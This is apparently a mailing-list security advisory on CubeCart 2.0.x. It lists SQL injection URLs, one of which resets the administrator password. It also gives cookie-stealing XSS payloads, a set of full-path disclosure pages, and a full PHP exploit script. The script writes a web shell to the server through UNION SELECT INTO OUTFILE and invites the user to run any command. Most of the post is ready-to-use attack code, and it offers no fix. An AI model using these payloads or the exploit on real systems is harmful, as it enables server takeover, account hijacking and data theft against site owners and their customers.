<<< Date Index >>>     <<< Thread Index >>>

CubeCart Multiple input Validation vulnerabilities



Hello,,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx


Sql injection


admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
it will reset the password for the administrator
--

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
xss
admin/print_order.php?order_id=<script>alert(document.cookie);</script>
--
view_order.php?order_id=<script>alert(document.cookie);</script>
--
admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
and language variables for this file ..
--
admin/image.php?image=<script>alert(document.cookie);</script>
--
admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
and all other variables in this file
--
footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>
--
header.inc.php?site_name=</title><script>alert(document.cookie);</script>
and all other variables in the file.
--
/***************************************/

Full path

information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X  and maybe other versions are injected
*/
print_r('
/**********************************************/
/*   CubeCart Remote sql injection exploit    */
/*     by HACKERS PAL <security@xxxxxxxxx>    */
/*         site: http://www.soqor.net         */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*  php '.$argv[0].' http://localhost/CubeCart/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit1="/cat_navi.php";
         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);

                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }

     $page = get_page($url.$exploit1);

             $pa=explode("<b>",$page);
             $pa=explode("</b>",$pa[2]);
             $path = str_replace("cat_navi.php","",$pa[0])."soqor.php";
             $var='\ ';
             $var  = str_replace(" ","",$var);
             $path = str_replace($var,"/",$path);
             
$exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20from%20store_docs/*";
     $page_now = get_page($url.$exploit2);
     if(ereg("mysql_fetch_array()",$page_now))
     {
          $newurl=$url."/soqor.php?cmd=id";
          Echo "\n[+] Go TO ".str_replace("//","/",$newurl)."\n[+] Change id to 
any command you want :)";
     }
     else
     {
          Echo "\n[-] Exploit Faild";
     }
     Die("\n/* Visit us : WwW.SoQoR.NeT                   
*/\n/**********************************************/");

?>

#WwW.SoQoR.NeT